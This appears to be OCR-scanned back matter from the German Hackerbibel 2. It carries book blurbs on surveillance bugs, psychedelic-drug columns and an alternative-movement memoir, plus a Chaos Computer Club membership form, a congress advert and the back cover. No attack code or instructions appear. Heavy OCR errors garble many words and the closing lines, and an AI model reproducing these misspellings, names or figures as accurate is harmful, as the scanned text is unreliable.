zeigen und wie man sich dagegen wehren bzw. Ihre Anwendu
wesentlich erschweren kann.“
Die Themen reichen von Kommentaren zum neuen Fernmelde!
lagengesetz über (humane) Erklärungen der „Hochfrequenz“ *1
hin zu Wanzenerklärungen und -verstecken. Als Zugabe gibt
noch Tips zur Chiffrierung persönlichster Daten.
64 Wochen lang füllte Sachbuchaulor R, Rippchen seine Drogen¬
bezogene Kolumne In der tages 2 eitung. Oie einzige Drogenko¬
lumne in einer Tageszeilung weltweit - die längste Kolumne in der
Geschichte der (az. In diesem Büchlein sind nun jene Kolumnen
vollständig dokumentiert. Dazu auch bislang unveröHentlichi©
Texte von Mr. Rippchen und anderen zum Thema. Das Ganze
auch noch heftig illuslrlert.
Inhalt; • Kiffer-Fabeln • Tiere und Drogen ♦ Krieg dem Rauschgift
• Designer Drogen • Dope Im Ostblock • MDMA, die Droge des
Jahres • Suchtsloffltommlssion der UN • Leserfeedback • Weiter¬
führende Buchtips • Muslkllps für psychedelische Reisen.
Der Autor mag weder Heroin noch Äppehvoi, Kokain oder
Schnaps. Daher werden solche Stoffe auch in diesem Buch
gemieden. Es geht um Aufklärung über psychedelische Drogen -
weder eine Verherrlichung, noch eine Verteufelung - und um zelt¬
gerechte Infos über Haschisch, MDMA. LSD und Artvenvandtes.
„Was für ein wundervolles Buch! Ich bewundere Ronald Rippchen,
er ist ein glänzendes Beispiel eines Kyber-Heros. Ich bin glücklich,
daß wir Freunde sind und zusammen 'fliegen'”, meint Altmeister
Timothy Leary zum Inhalt dieses Buches, ln der Tat!
ISBN 3-925817-19-0 lOOSeiten 10 DM/SFR
NIcholas Albery
GENERALPROBE
FÜR DAS JAHR 2000
Drogen, Hausbesetzer, Rechtsverdrehungen,
Alternativsteuern, Liebe, Sekten, Visionen, Alternatives
Radio, Festivals und Mondenergie
Der Grüne Zweig 90
ISBN 3-925817-22-0
70 Selten
10DM/S
OAS SCHUSS BUC
msTime, mma, msoneusi
Mmmicm Hkali
M« e»ffVt IWllQ ,21
Werner Pieper
DAS SCHEiSSBUCH
Entstehung, Nutzung und Entsorgung
•Drogen • Religion • Spinnereien • Kommunen • Ijebe • Visionen Der Grüne ZweiQ
... Nicholas Albery arbeitet wahrhaft alternativ: viel Maloche, viel
Phantasie, viel Schlllzohrigkelt. viel Kommunikation & keine Kohle.
Viele seiner Aktivitäten In London färbten auch auf Deutschland
ab: alternatives Steuersystem. Freistaal Freslonla, die ersten Glo¬
betrotterbücher, ja auch die GRÜNEN ZWEIGE sind von Impulsen
Albery's beseelt.
Übersetzt von Werner Pieper.
„... Hunderte von Möglichkeiten angepriesen, wie man ohne eine
müde Mark Innerslädtisch schlafen, essen und umherschweifen
könne. Als radikaler Robin Hood der Neuzeit, mit Milchpulver und
Honig bewaffnet, reiste Nicholas Albery später quer durch die
internationale Landkommunen-Krischna-Szene, inszenierte Pira¬
tensender und Free Festivals urid zog sich schließlich in einen ori¬
ginal-britischen Pferdewagen zurück, mit dem er monatelang
durch Wales kutschierte, um aul diesem ganz speziellen Trip sei¬
nen längst fälligen Hippie-Klassiker GENERALPROBE FÜR DAS
JAHR 2000 zu schreiben ... Summa Summarum sind Alberys
Erlebnisse ein Dokument, das nicht ganz so ausgeflippt ist wie die
Freak-Brothers-Geschtchten, dafür aber die deutsche APO-Gene-
ration um einiges an Ausgeflipptheit übertrifft “ (tip 2/B4j
. Alberys Ideenquell scheint einfach nicht zu versiegen ... eine der¬
art ausgeprägte Art des Konsurnverzichts plus sozialer Aktivitäten
habe ich noch nicht erlebt.“ ftaz)
„Nicholas Albery Ist eine der zentr.ilon Figuren in der Goscliichte
der engKsetmn Alternaliv-Bewegung. Albery selbst beschreibt
sein Buch als einen .verblüffenden Augenzeugenbericht der
Geschichte der Alternativgesellschatt von 1968 bis 1975'.'' (aus:
Peace News. London)
258 Selten nur 9.ß0 DM/SFR
ECHT ÄTZEND!
7 WARNUNGS-STICKER
Der Grün© Zweig 114
VORSICHT .ASSE - GESUNOHeTtsSCHADL.CH "
Finale
7 AulM obo,^
CcC
Chaos Chaos
Computer
Club
eingetragener Verein für
User, Hackerund Datenreisende
*Leitsfelle eVa, Schwenckestr. 85, D-2000 Hamburg 20*
DER CHAOS COMPUTER CLUB STELLT SICH VOR AUF
SEITE 137 IN DIESER HACKERBIBEL - ALSO 2URÜCK-
BLAiTTERN
Mitgliedschaft kann in der Leilstelle eVa beantragt werden.
Anträge werden für Einzelpersonen oder Gruppen angenom¬
men. Fördernde Mitglieder unterstützen den intergalaktischen
Patrouillendienst am Rande der Unkenntlichkeit.
Der CCC-lnformationsdienst wird aktiv, sobald Anmeldung
und V-Scheck (oder Briefmarken) im Chaos-Dienst der Leit-
stelle eVa angekommen sind. Größere Förderabos vorher
ankündigen, damit der CCC rechtzeitig reagieren kann.
Beiträge zur Förderung des CCC
.cccVW 20 DM. Aufnahmegebühr (einmalig lOt
Verwaltung) gewünschte Leit¬
stellennummer: .(*)
.cccFI ab 230 DM. Förderndes Mitglied bis 29 . 2.88
. cccNI 120 DM.,... Normales Mitglied bis 29.2.88
. cccSI 60 DM . Schüler u. ä. bis 29,2.88
. eceSO 30 DM. Schüler u. ä. bis 31.8.87
naturgemäß portofrei und unverpackbar
Chaos-Jahr endet mit Schaltjahr oder nicht.
(■) Leitslellennummer umfaBt mind. i Ziflern. Stelle 1 + 2 isiTel-Vorwahl HH 40.
Berlin 30. Kiel 43 usw.. Wünsche werden nach Möglichkeit erfüllt.
Communication
Congress
Die Europäische Hackerparty
immer zwischen den Jahren am letzten
Wochenende des Jahres
Eidelstedter Bürgerhaus,
Elbgaustraße 12, 2000 Hamburg 54
Das Treffen für Datenreisende!
Telefon, Datex, Btx, Telex,
Mailboxbetrieb, Datenfunk,
Videovorführung.
Aktive Workshops, Video- & Papercopiers
Eintritt: Mitglieder 20 DM
Private Kongressteilnehmer 30 DM
Presse 50 DM
Gewerbliche Teilnehmer 100 DM
Voranmeldung durch Überweisung
auf Postgiro 551257/204 PschA Hamburg
Sonderkonto C./S. Wernery
die Datenschleuder
Das wissenschaftliche Fachblatt für Datenreisende /n
Ein Organ des Chaos Computer Club HH “l
Redaktion Datenschleuder, Schwenkestr. 85, 2000 Hamburg 20. Redaktionstreff donnerstags 19 Uhr
HA C K ER
DAS MEIE
B I B E L 2
TESTAMENT
HRSG. CHAOS COMPUIEB CLHB • DER GRÜHE ZWEIG 124
Hacker sind keine vorüberge¬
hende Modeerscheinung wie
Punks oder Juppies. Hacker
sind eine feste Größe in einer
menschlichen Zukunft.
Seit dem Erscheinen von
HACKER BIBEL I haben
die fungs vom Chaos Com¬
puter Club durch ihre Aktio¬
nen immer wieder die Schlag¬
zeilen der Weltpresse erobert.
In diesem Buch werden ihre
Taten dokumentiert, hier
klären sie den Leser über ihre
Motivationen auf: vom NA¬
SA Hack, über die Viren-
Gefahr, Netzwerk Hoffnun¬
gen und die Hacker Ethik.
AUS DEM INHAIT;
DIE VDILSIÄHDIGEH ADSGABEH
DER DATEHSCHLEUDER, DD. I3-2S
FAKSIMILIERT • DOKDMEHTATIOH
DES HIREH FORDMS • PDETRDHIG
TALKS • DIE ZEIT DES IHDIAHER-
SPIELEHS IST VORBEI • HACKER IH
HAFT DIE TECHHIK IH DIE SCHRAHKEH WEISER
STRAHLEHDE COMPUTER • REALITY HACKERS
UHD CYRER PUHKS • ... AUF EDV-FACHFRAU
UMCESCHULT »MEGA RRAIH MIT MIHI-MASCHI-
HEH • ZUR LAGE DER HATIOH IM GETEILTER FIZ
DEDTSGHLAHD • SATELLITEH UHDSCHÜSSELH*
DATEH: AUFZUCHT a PFLEGE • DATCH MAGIC •
GO STOP GO • KREATIVES UHD KOHSTRUKTIVES
CHAOS EH MASSE •
INTEN lEN AUTSNEN; DIVENSE MIT6LIEDEN DES CNAOS
eOMPDTED CIDDS, Z.D. STEFFEN WERNEIY, IR. WAN
N.V.A.M. •JISEPI WEIZENIADM • PETER GIASEI • MINIS
DELTA T «TIM LEARY • POETDDNIC • NANS GLISS • DIETER
SCNHMACNER ‘ MARIA NEFF-UTNDFF • DERIIAN DRECIEI
- -^ --
326niA \3CQi5 L264971
T159CC 33 ,33
^^C^£:•cIE£L 2.LIS KEcfc IE
SS.13 DM. SFR ; 2t tt Mi** i